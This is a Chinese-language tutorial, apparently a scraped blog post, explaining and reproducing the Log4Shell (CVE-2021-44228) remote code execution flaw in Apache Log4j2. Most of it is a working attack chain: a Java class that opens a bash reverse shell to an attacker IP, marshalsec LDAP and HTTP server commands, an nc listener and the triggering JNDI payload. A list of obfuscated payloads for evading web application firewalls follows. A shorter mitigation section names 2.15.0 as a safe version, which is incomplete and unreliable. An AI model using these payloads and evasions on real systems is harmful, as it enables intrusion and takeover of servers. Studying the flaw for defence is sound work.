Apache Log4j2 远程代码执行漏洞（CVE-2021-44228）深入分析与复现指南<\/strong><\/h2>
一、漏洞概述<\/strong><\/h3>
CVE编号<\/strong>：CVE-2021-44228
漏洞名称<\/strong>：Log4Shell
威胁等级<\/strong>：严重（Critical）
影响组件<\/strong>：Apache Log4j2，一个基于Java的流行日志记录框架。
漏洞本质<\/strong>：由于Log4j2提供的Lookup功能<\/strong>未对用户输入进行充分验证，导致攻击者可以通过构造特殊的日志信息，触发JNDI注入<\/strong>，从而实现远程代码执行（RCE）。<\/p>
二、核心知识：漏洞机制深度解析<\/strong><\/h3>
要理解此漏洞，需要掌握三个关键技术的交互作用：<\/p>
1. Log4j2 的 Lookup 机制<\/strong><\/h4>
Lookup是Log4j2的一项功能，允许用户在日志配置或日志消息中动态地添加某些值。其语法格式为 ${prefix:name}<\/code>，其中prefix<\/code>指定了查找的类型。<\/p>
示例<\/strong>： ${java:version}<\/code>：插入当前Java版本。<\/li> ${env:PATH}<\/code>：插入系统环境变量PATH的值。<\/li> 关键点<\/strong>：${jndi:logging\/context-name}<\/code> 是一种特殊的Lookup，它允许通过JNDI（Java命名和目录接口）<\/strong> 从远程服务获取对象。<\/li> <\/ul> <\/li> <\/ul> 2. JNDI (Java Naming and Directory Interface)<\/strong><\/h4> JNDI是Java提供的一个API，用于通过名称来访问和定位各种服务和资源（如数据库、文件系统、目录服务等）。它支持多种协议，其中两种对此漏洞至关重要：<\/p> RMI (Remote Method Invocation)<\/strong>： Java的远程方法调用协议。<\/li> LDAP (Lightweight Directory Access Protocol)<\/strong>：轻量级目录访问协议。<\/li> 漏洞利用关键<\/strong>：JNDI的一个危险特性是，它支持从远程服务器动态加载和实例化Java对象<\/strong>。如果JNDI客户端（即存在漏洞的应用程序）解析了一个指向恶意服务器的地址，该服务器可以返回一个指向恶意Java类的引用，客户端则会自动下载并执行该类。<\/li> <\/ul> 3. 漏洞触发链条<\/strong><\/h4> 漏洞的触发是上述两者结合的结果，其流程如下图所示：<\/p> flowchart TD A[攻击者构造恶意请求] --> B[应用程序记录包含 ${jndi:ldap:\/\/evil.com\/x}的日志] B --> C[Log4j2解析日志消息 识别JNDI Lookup表达式] C --> D[Log4j2向恶意LDAP服务器 evil.com 发起JNDI查询] D --> E[恶意LDAP服务器响应 并返回一个指向 http:\/\/evil.com\/Exploit.class的引用] E --> F[存在漏洞的服务器 从HTTP地址下载并实例化Exploit类] F --> G[Exploit类的静态代码块 或构造函数中的恶意代码被执行] G --> H[成功实现远程代码执行 （如反弹Shell）] <\/code><\/pre> 三、受影响版本<\/strong><\/h3> 受影响版本<\/strong>：Apache Log4j 2.x <= 2.14.1<\/li> 安全版本<\/strong>：Apache Log4j 2.15.0 及以上版本（首次修复）<\/li> <\/ul> 四、漏洞复现实践<\/strong><\/h3> 环境准备<\/strong><\/h4> 靶机<\/strong>：一台运行存在漏洞的Java应用（如文中提到的Solr服务）的服务器。<\/li> 攻击机<\/strong>：一台可控的公网或内网服务器（Kali Linux或类似系统）。<\/li> 工具<\/strong>： marshalsec<\/strong>：用于快速启动恶意JNDI\/LDAP服务器的工具。<\/li> Dnslog.cn<\/strong>：用于无回显漏洞的初步验证。<\/li> Netcat<\/strong>：用于接收反弹Shell。<\/li> <\/ul> <\/li> <\/ol> 复现步骤<\/strong><\/h4> 步骤一：初步验证（利用DNSLog）<\/strong> 此步骤用于无害验证目标是否存在漏洞，且日志记录功能是否开启。<\/p> 访问 dnslog.cn<\/code>，获取一个临时域名，例如 abc123.dnslog.cn<\/code>。<\/li> 向目标应用发送包含以下Payload的请求（例如通过HTTP头、参数等）： ${jndi:ldap:\/\/${sys:java.version}.abc123.dnslog.cn} <\/code><\/pre> <\/li> 刷新dnslog页面，如果看到有以你当前Java版本（如1.8.0_181<\/code>）为子域名的DNS查询记录，则证明漏洞存在。<\/li> <\/ol> 步骤二：实现远程代码执行（反弹Shell）<\/strong><\/p> 编写恶意Java类（Exploit）<\/strong> 创建一个名为 Reverse.java<\/code> 的文件，内容如下。此代码将在被加载时执行，尝试建立反向连接。<\/p> import<\/span> java.lang.Runtime;<\/span> <\/span><\/span>import<\/span> java.lang.Process;<\/span> <\/span><\/span>public<\/span> class<\/span> Reverse<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime rt =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span> \/\/ 将命令修改为适合目标系统的命令（这里是Linux bash反弹Shell） <\/span><\/span><\/span><\/span> String[]<\/span> commands =<\/span> {<\/span>"bash"<\/span>,<\/span> "-c"<\/span>,<\/span> "bash -i >& \/dev\/tcp\/攻击机IP\/监听端口 0>&1"<\/span>};<\/span> <\/span><\/span> Process pc =<\/span> rt.<\/span>exec<\/span>(<\/span>commands);<\/span> <\/span><\/span> pc.<\/span>waitFor<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> \/\/ 忽略异常 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 编译恶意类<\/strong><\/p> javac Reverse.java <\/span><\/span><\/code><\/pre>这将生成 Reverse.class<\/code> 文件。<\/p> <\/li> 搭建恶意HTTP服务<\/strong> 将 Reverse.class<\/code> 文件放入一个目录，并在该目录下启动一个简单的HTTP服务器，端口为8080。<\/p> python3 -m http.server 8080<\/span> <\/span><\/span><\/code><\/pre><\/li> 启动恶意LDAP服务器<\/strong> 使用 marshalsec<\/code> 工具启动一个LDAP服务器，它会将客户端的JNDI请求重定向到你的HTTP服务。<\/p> java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:\/\/你的攻击机IP:8080\/#Reverse"<\/span> 5555<\/span> <\/span><\/span><\/code><\/pre>此命令会在5555端口启动LDAP服务，当有客户端查询 Reverse<\/code> 时，会指引其从 http:\/\/你的攻击机IP:8080\/Reverse.class<\/code> 下载类文件。<\/p> <\/li> 在攻击机监听端口<\/strong><\/p> nc -lvnp 4563<\/span> # 监听4563端口，等待反弹Shell连接<\/span> <\/span><\/span><\/code><\/pre><\/li> 发送最终Payload触发漏洞<\/strong> 向目标应用发送最终的攻击载荷：<\/p> ${jndi:ldap:\/\/你的攻击机IP:5555\/Reverse} <\/code><\/pre> <\/li> 获取Shell<\/strong> 如果一切配置正确，你将在Netcat监听端口中收到来自目标服务器的反向Shell连接，从而获得对目标系统的控制权。<\/p> <\/li> <\/ol> 五、绕过WAF的Payload技巧<\/strong><\/h3> 文章列举了多种混淆Payload以绕过Web应用防火墙（WAF）规则的方法：<\/p> 大小写混淆<\/strong>：<\/p> ${jNdI:lDaP:\/\/evil.com\/x}<\/code><\/li> ${${lower:JNDI}:${lower:LDA}P:\/\/evil.com\/x}<\/code><\/li> <\/ul> <\/li> 利用默认值语法 ${:-}<\/code><\/strong>：<\/p> ${${::-J}ndi:ldap:\/\/evil.com\/x}<\/code><\/li> ${${env:NOT_EXIST:-j}ndi:${env:NOT_EXIST:-l}dap:\/\/evil.com\/x}<\/code><\/li> <\/ul> <\/li> 字符拆分与组合<\/strong>：<\/p> ${${lower:J}${lower:N}${lower:D}i:ldap:\/\/evil.com\/x}<\/code><\/li> <\/ul> <\/li> Unicode编码<\/strong>：<\/p> ${\u006a\u006e\u0064\u0069:\u006c\u0064\u0061\u0070:\/\/evil.com\/x}<\/code>（\u006a<\/code>是j<\/code>的Unicode编码）<\/li> <\/ul> <\/li> 多种技巧组合<\/strong>（最有效）：<\/p> ${${a:-j}ndi:${lower:L}${upper:D}ap:\/\/evil.com\/x}<\/code><\/li> ${jnd${upper:ı}:ldap:\/\/evil.com\/x}<\/code>（使用类似ı<\/code>的字符）<\/li> <\/ul> <\/li> <\/ol> 六、修复与防御方案<\/strong><\/h3> 紧急缓解措施（治标）<\/strong>：<\/p> 设置系统属性<\/strong>：在启动Java应用时添加参数 -Dlog4j2.formatMsgNoLookups=true<\/code>。此操作会全局禁用Lookup功能，从而阻断JNDI注入。<\/li> 修改日志配置<\/strong>：对于Log4j 2.10及以上版本，可在配置文件 log4j2.component.properties<\/code> 中设置 log4j2.formatMsgNoLookups=true<\/code>。<\/li> 网络层控制<\/strong>：使用防火墙策略严格限制应用服务器的出站连接，禁止其随意访问外网，尤其是LDAP（389\/636）和RMI（1099）等协议端口。<\/li> <\/ul> <\/li> 根本解决方案（治本）<\/strong>：<\/p> 升级Log4j2<\/strong>：立即将Log4j2组件升级到官方发布的安全版本（2.15.0<\/strong> 或更高版本）。这是最有效、最彻底的修复方式。<\/li> <\/ul> <\/li> WAF规则更新<\/strong>：<\/p> 部署能检测上述各种混淆技术的WAF规则，对包含可疑模式（如jndi:<\/code>, ldap:<\/code>, rmi:<\/code>，以及各种大小写和编码变种）的请求进行拦截。<\/li> <\/ul> <\/li> <\/ol> 总结<\/strong>：CVE-2021-44228是一个典型的“供应链漏洞”，其危害性极大，因为日志功能是几乎所有应用程序的基础组件。理解其原理、掌握复现方法、并知晓如何防御和绕过防御，对于安全研究人员、开发人员和运维人员都至关重要。<\/p>